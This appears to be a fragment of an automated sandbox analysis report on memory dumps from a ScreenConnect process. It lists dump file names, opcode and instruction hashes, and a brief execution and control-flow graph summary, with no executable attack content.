                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5f7f6e2bd0e5336825268a88a580a522a2a69023fc6468e9229e326ec9d309d1
                                                                                                                                                                                                                                                    • Instruction ID: 4012aefbacf1d2e80c52db1b1ffa30fd418f24c27ac9a2f93e82cf4d5e9a8b50
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f7f6e2bd0e5336825268a88a580a522a2a69023fc6468e9229e326ec9d309d1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43E065753052444FD7095B78A02446D7FAAEBDD363B15A0A6D505C33D5CF349C16D740
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 07bdeb9058c42ed7fcf7fa22db690fd4fa43dd4e6d9ba0d3e7e3fe5883121728
                                                                                                                                                                                                                                                    • Instruction ID: 67120d1b9f0cc5c9693a617a549105eb016c3e2eeec2440989e251003618d749
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07bdeb9058c42ed7fcf7fa22db690fd4fa43dd4e6d9ba0d3e7e3fe5883121728
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8E02633304700AB9B209A19E881C4FBFACEB88224344817AE40D9B344DF30FD04C7E4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 37c52fcb1401a01fabd72376be89701019668b64ff69df190461621eabe41f65
                                                                                                                                                                                                                                                    • Instruction ID: e76476ac77bdf4fdf701d05a258fd7ca6399d19db6d84d7d0e4b710c958bb252
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37c52fcb1401a01fabd72376be89701019668b64ff69df190461621eabe41f65
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89E09B315482954FCB16D668F8816CD2FF5DF92210B0809EAD4415B557D768990EC391
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f40406776c77d8aa51c434f24b2fdc8ce8e96e1fe1bddd2d650498eba15ce3e8
                                                                                                                                                                                                                                                    • Instruction ID: 5804f8f3c50a948fa56314a2825df03cdcd1476c160dc2b0b29b24b23b0db089
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f40406776c77d8aa51c434f24b2fdc8ce8e96e1fe1bddd2d650498eba15ce3e8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2E086323056056B87249A19E881C5FBFADEB89660744816AE50D8B645DE31FD05C7E4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 434dcc7b0945d6393a08f5768e898d0732e34d0e1f27b9d1d0727035d59bc6cf
                                                                                                                                                                                                                                                    • Instruction ID: a2e6226245051190438c3265db53a59a1f48e99b2fb89302b96dd3faaf71000d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 434dcc7b0945d6393a08f5768e898d0732e34d0e1f27b9d1d0727035d59bc6cf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFE046B63012145B97086679A41886E7A9EEBDD262B14A126E50AC3394CF389C02CBA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 38dbe2c3d150a317dbeb4a38ffa6f460ef27965fe78b3b3d6dfd374a2ea50ff3
                                                                                                                                                                                                                                                    • Instruction ID: d1918928fc8222929f4ba650362623785990d36428bc32e239d2ad6b9958d83a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38dbe2c3d150a317dbeb4a38ffa6f460ef27965fe78b3b3d6dfd374a2ea50ff3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75E086327002045746086B6DA40586E7B9EDBC651034849BDE509DF211DF76EC0747D0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5fb7a212584c0bd9af3180a3f6138ddaec71643c33db7fd81edeeacf688f7439
                                                                                                                                                                                                                                                    • Instruction ID: 850d1b99684e569dc67a20c9996560a02df34456f57346bbdca7bf05cf1350c7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fb7a212584c0bd9af3180a3f6138ddaec71643c33db7fd81edeeacf688f7439
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9E08C7B200600ABC3009A1ADA08E4ABFA9EFD9721B09807BF509C7320DA35EC208790
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 06792cadd730269575d286f3d920b09e842604efc05e3c90c0891ab9c4f54478
                                                                                                                                                                                                                                                    • Instruction ID: cdef64b9776e6b794f18461e9dfde1baa9046b7e642892eecb29fe77729ba273
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06792cadd730269575d286f3d920b09e842604efc05e3c90c0891ab9c4f54478
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7E09230D44184DFCB59EFB49A5155D7BF4DF0B204B0054DED409E7221DA345E08DB40
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 404e9af7075fcc8518762a0efb89997160529e510fb9f1bac18f8a14cce7d126
                                                                                                                                                                                                                                                    • Instruction ID: dfde2d02268df65d8e51707b284627ffeebe0439d7407c32ae0ebed6414fb3cb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 404e9af7075fcc8518762a0efb89997160529e510fb9f1bac18f8a14cce7d126
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFE08C718492418FC380EF34B989084BFF0FB05214B5984AED8C8C3602E339A9478B82
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 644cc1ae3e291ffd3e2543b2f9d79e47db8462920e48444ef2863db12e4a947f
                                                                                                                                                                                                                                                    • Instruction ID: d2669d3a7bb935d017d9ead0b877fb5c4da0ef7434c78f2d46ce2afbf0f3981b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 644cc1ae3e291ffd3e2543b2f9d79e47db8462920e48444ef2863db12e4a947f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFE0C2B66083149FC7069F68D810C9A3BB99F0A65030280A7F945CB371DA71AE04E791
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2c0315b67c31acbf64d6d594efaac321cb3f7762a8b25479f005f33d343799e9
                                                                                                                                                                                                                                                    • Instruction ID: d7c918bce97e96fcb0ba6a2c9c9bf8e935e66112da6a572854bf284f5ec9eee6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c0315b67c31acbf64d6d594efaac321cb3f7762a8b25479f005f33d343799e9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3E04F7090D3809FC342AF38A9541497FF0AE06600B4684AED8C9C7251E335AC46C762
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 00cbbd88731c1a305cf08ebb71de3513eb9419902e472cb2402f62bf3fd02d9e
                                                                                                                                                                                                                                                    • Instruction ID: f11a18d21a6e672efcd81f493fddbff6ba315550f620d706f9b3033ab00c64c5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00cbbd88731c1a305cf08ebb71de3513eb9419902e472cb2402f62bf3fd02d9e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1D05E3A3005149F83049B4EE508C4ABFEAEFC9721305807AF609C7320CA71EC11CB94
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2c5201a4473785114aeeb0dfabaef7497aa4427763a1455d65d9cc178fc7ae82
                                                                                                                                                                                                                                                    • Instruction ID: 933337b673302e4ec11ea5aa8a9237ed445890eaab044f5e6e70031c0ab81469
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c5201a4473785114aeeb0dfabaef7497aa4427763a1455d65d9cc178fc7ae82
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26E086314087498FC701EF68D459465BFF4EF95200B05868BE5895B123FB70D585D741
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 63d2bdbd0d9cd1a586bfc3a42f4867219177270d2be89b78bac2a9bb35154bf2
                                                                                                                                                                                                                                                    • Instruction ID: 28f730f028c5a6331b966716aaaccd58b57c9073b4605a0618eab8c74acfa278
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63d2bdbd0d9cd1a586bfc3a42f4867219177270d2be89b78bac2a9bb35154bf2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AD01230D41148EF8B08EFA4E90055DB7FDEB49205B1055A9D809D3214DA316E049B80
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ec41a23ce0cbad856d2961933688f6590acc50f310d09cd8e8ac97a8f2554547
                                                                                                                                                                                                                                                    • Instruction ID: d5fc5681ab6aeb293e6fb924701fa591d4b1cb9b002ff8b2ea170c1e9c0e6315
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec41a23ce0cbad856d2961933688f6590acc50f310d09cd8e8ac97a8f2554547
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6D0A733300014AFAB089B5CD410C567BD9DF985203004066F908D7331CB71EC1097E1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 27050b8ef231e9396bd5d1225619073b35999da386b10fd3f0d562816f16c337
                                                                                                                                                                                                                                                    • Instruction ID: 8330350aa878a0c9ab65dd261154426749f54094b043e4e1786fc005a7aa60de
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27050b8ef231e9396bd5d1225619073b35999da386b10fd3f0d562816f16c337
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43D012357106245F9744AA5DE404C9A77DEDF4D660310407AF605CB330DEB1AD1097D4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6f4dbcecb20b37eb951089d93f71da77079779c549dab9dbf5f3e9466ddacc90
                                                                                                                                                                                                                                                    • Instruction ID: eec71576231dcd769f3cbbbd754d03d526c6f909ece09d56e954e2f43ea30eed
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f4dbcecb20b37eb951089d93f71da77079779c549dab9dbf5f3e9466ddacc90
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1D0C7363001149F97089A5DD414C567BD9DF995607114066E509C7371DA71DC1197D5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 69116d112186de98f7888db52e78eb996838662015ebe31c26c236b72995063c
                                                                                                                                                                                                                                                    • Instruction ID: c4cc06208a4b9aa5982004f6ade88abc5fe0e892144ae3b7475fdbb797835147
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69116d112186de98f7888db52e78eb996838662015ebe31c26c236b72995063c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6C080617440100FC294D10CDCA0615EBE2DBE924572CC4B7A51DC77B5D971CC538345
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4f4039d04769ede1ba66e470d048f25482d74884a16133a5fff78a5ac3c2c596
                                                                                                                                                                                                                                                    • Instruction ID: 6203088b9df24af69f16b7bdfa0901a4c3992bec5cf05b4f6576f19a2cf3d925
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f4039d04769ede1ba66e470d048f25482d74884a16133a5fff78a5ac3c2c596
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DD0C932814B0D8ACB00BFB8D4554A9FBB8EFD5240F00CA5EE88A67121FF70E6D0D681
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
                                                                                                                                                                                                                                                    • Instruction ID: e413b76829ce511345703c63ff0569b35dd3d5bbca212faf01176842e92940fb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BB011302000008B8288CA08C880808F3A2ABE8308328C0AEA808CB20ACF33E803CA08
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f8d2d8656668ca5a9b2be514fb54994d9c8b1bba9fcda8ff2eabc9c2103c0284
                                                                                                                                                                                                                                                    • Instruction ID: 37f3283f21eecc101d6e058e1ad04a8a4f1e7d62e434ae583a9c914f3cf7d3f4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8d2d8656668ca5a9b2be514fb54994d9c8b1bba9fcda8ff2eabc9c2103c0284
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:14.3%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:5
                                                                                                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                                                                                                    execution_graph 11525 7ff848f18014 11527 7ff848f1801d 11525->11527 11526 7ff848f18082 11527->11526 11528 7ff848f180f6 SetProcessMitigationPolicy 11527->11528 11529 7ff848f18152 11528->11529

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 44 7ff849225951-7ff849225984 call 7ff8492240d0 call 7ff8492209c0 * 2 52 7ff84922598a-7ff849225998 44->52 53 7ff84922671e-7ff849226731 44->53 55 7ff84922599a-7ff84922599c 52->55 56 7ff84922599e-7ff8492259ad 52->56 57 7ff8492259b0-7ff8492259b2 55->57 56->57 59 7ff8492259b8-7ff8492259d4 57->59 60 7ff849225af2-7ff849225af5 57->60 59->60 80 7ff8492259da-7ff8492259ec 59->80 61 7ff849225afb-7ff849225b06 60->61 62 7ff849225c30-7ff849225c37 60->62 66 7ff849225b08-7ff849225b25 61->66 67 7ff849225b52-7ff849225b60 61->67 63 7ff849225c3d-7ff849225c44 62->63 64 7ff849225cc7-7ff849225cce 62->64 63->64 71 7ff849225c46-7ff849225c54 63->71 68 7ff849225cd9-7ff849225cec 64->68 69 7ff849225cd0-7ff849225cd7 64->69 74 7ff84922673b-7ff84922674c 66->74 75 7ff849225b2b-7ff849225b50 66->75 67->62 88 7ff849225cfd-7ff849225d05 68->88 89 7ff849225cee-7ff849225cf3 68->89 69->68 76 7ff849225d16-7ff849225d1d 69->76 71->76 100 7ff849225c5a-7ff849225ca1 71->100 122 7ff84922674d-7ff84922675e 74->122 75->67 78 7ff849225f81-7ff849225f88 76->78 79 7ff849225d23-7ff849225d2a 76->79 78->53 86 7ff849225f8e-7ff849225f95 78->86 79->78 82 7ff849225d30-7ff849225d33 79->82 83 7ff849225a3a-7ff849225a4a 80->83 84 7ff8492259ee-7ff849225a0b 80->84 91 7ff849225d3c-7ff849225d4a 82->91 92 7ff849225d35-7ff849225d37 82->92 102 7ff849225a11-7ff849225a38 84->102 103 7ff849226732-7ff84922673a 84->103 86->53 95 7ff849225f9b-7ff849225fad 86->95 98 7ff849225d0b-7ff849225d0f 88->98 99 7ff849226771-7ff8492267a3 88->99 89->88 117 7ff849225d4c 91->117 118 7ff849225d4e 91->118 101 7ff849225dea-7ff849225ded 92->101 104 7ff849225ff9-7ff84922600c 95->104 105 7ff849225faf-7ff849225fba 95->105 98->76 100->71 145 7ff849225ca3 100->145 110 7ff849225def-7ff849225df1 101->110 111 7ff849225df6-7ff849225e04 101->111 102->83 103->74 123 7ff849226013-7ff84922601e 104->123 105->78 120 7ff849225fbc-7ff849225fcc 105->120 121 7ff849225ea5-7ff849225eab 110->121 138 7ff849225e08 111->138 139 7ff849225e06 111->139 127 7ff849225d50-7ff849225d53 117->127 118->127 129 7ff84922675f-7ff849226770 120->129 130 7ff849225fd2-7ff849225ff7 120->130 125 7ff849225f5d-7ff849225f5f 121->125 126 7ff849225eb1-7ff849225eb3 121->126 122->129 132 7ff8492260c1-7ff8492260c7 123->132 133 7ff849226024-7ff84922603c 123->133 125->78 141 7ff849225f61-7ff849225f69 125->141 126->125 135 7ff849225eb9-7ff849225eed 126->135 136 7ff849225d5d-7ff849225d68 127->136 137 7ff849225d55-7ff849225d5b 127->137 129->99 130->104 132->53 144 7ff8492260cd-7ff8492260d5 132->144 133->132 169 7ff849226042-7ff849226043 133->169 135->125 151 7ff849225d6a-7ff849225d87 136->151 152 7ff849225db4-7ff849225dd5 136->152 150 7ff849225dd8-7ff849225de8 137->150 148 7ff849225e0a-7ff849225e0d 138->148 139->148 141->78 142 7ff849225f6b-7ff849225f7d 141->142 142->78 155 7ff84922611d-7ff849226125 144->155 156 7ff8492260d7-7ff849226116 144->156 159 7ff849225e0f-7ff849225e15 148->159 160 7ff849225e17-7ff849225e22 148->160 150->101 151->122 171 7ff849225d8d-7ff849225db2 151->171 152->150 155->53 165 7ff84922612b-7ff849226178 155->165 156->155 166 7ff849225e93-7ff849225ea3 159->166 167 7ff849225e6e-7ff849225e90 160->167 168 7ff849225e24-7ff849225e2f 160->168 192 7ff84922617a-7ff8492261a4 165->192 166->121 167->166 168->167 178 7ff849226046-7ff8492260ac 169->178 171->152 198 7ff8492260b9-7ff8492260bf 178->198 199 7ff8492260ae-7ff8492260b4 call 7ff849225170 178->199 202 7ff8492261aa-7ff8492261b5 192->202 203 7ff849226711-7ff849226718 192->203 198->132 198->178 199->198 202->192 205 7ff8492261b7-7ff849226260 202->205 203->53 203->165 205->203
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: (O"I$x!!I$X!I
                                                                                                                                                                                                                                                    • API String ID: 0-481848013
                                                                                                                                                                                                                                                    • Opcode ID: 5e91e7c191de2721839b4a6c7bcf7da2377f2d2c60b2e0d625c8c9d9b705ab8f
                                                                                                                                                                                                                                                    • Instruction ID: 3122899ae0c1b571aa8dc13680bf659fcac68dcd74a9356d656513a3ea3ed1e4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e91e7c191de2721839b4a6c7bcf7da2377f2d2c60b2e0d625c8c9d9b705ab8f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA22E331D1DAAB8FF7A9BE2894556B533D1EF94780F5441BAD42EC72C7DD2CA8068280

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
